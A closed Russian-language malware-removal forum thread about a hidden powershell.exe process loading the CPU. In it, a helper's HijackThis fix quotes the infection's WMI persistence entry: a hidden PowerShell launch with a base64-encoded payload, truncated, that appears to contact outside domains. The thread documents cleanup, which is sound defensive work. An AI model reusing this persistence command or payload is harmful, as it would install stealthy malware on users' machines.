Закрыто Вирус через powershell.exe нагружает процессор

Статус
В этой теме нельзя размещать новые ответы.

NerV

Новый пользователь
Сообщения
1
Реакции
0
Здравствуйте.
Процесс powershell.exe загружает процессор примерно на 50-60%. Это уже не первый случай на этом компьютере обнаружения этой гадости, но прежде удавалось обходиться своими силами убивая процесс и удаляя задачу в планировщике. А теперь процесс пауршелла скрывается из общего списка в диспетчере и увидеть можно лишь через Process Explorer. При этом его даже не убить, система говорит что недостаточно привелегий.
 

Вложения

  • CollectionLog-2020.02.08-18.52.zip
    45.9 KB · Просмотры: 4
Последнее редактирование:
Здравствуйте!

"Пофиксите" в HijackThis:
Код:
O25 - WMI Event: Systems Manage Consumer - Systems Manage Filter - Event="__InstanceModificationEvent WITHIN 5601 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  powershell.exe -NoP -NonI -W Hidden -E JABwAGkAbgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAaQBuAGYAbwByAG0AYQB0AGkAbwBuAC4AcABpAG4AZwANAAoAJABzAGUAPQBAACgAKAAnAHUAcABkAGEAdABlAC4ANwBoADQAdQBrAC4AYwBvAG0AJwApACwAKAAnAGkAbgBmAG8ALgA3AGgANAB1AGsALgBjAG8AbQAnACkALAAoACcAMQAxADEALgA5ADAALgA

Перезагрузите компьютер вручную и соберите свежий CollectionLog.
 
  • Like
Реакции: NerV
Здравствуйте!

Ввиду отсутствия активности в течение последних 10 дней, предположу, что помощь больше не нужна. Поэтому тема закрывается.
Если Вам по-прежнему нужна помощь, отправьте личное сообщение одному из модераторов и укажите ссылку на эту тему.

Спасибо за использование нашего форума и удачи!
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу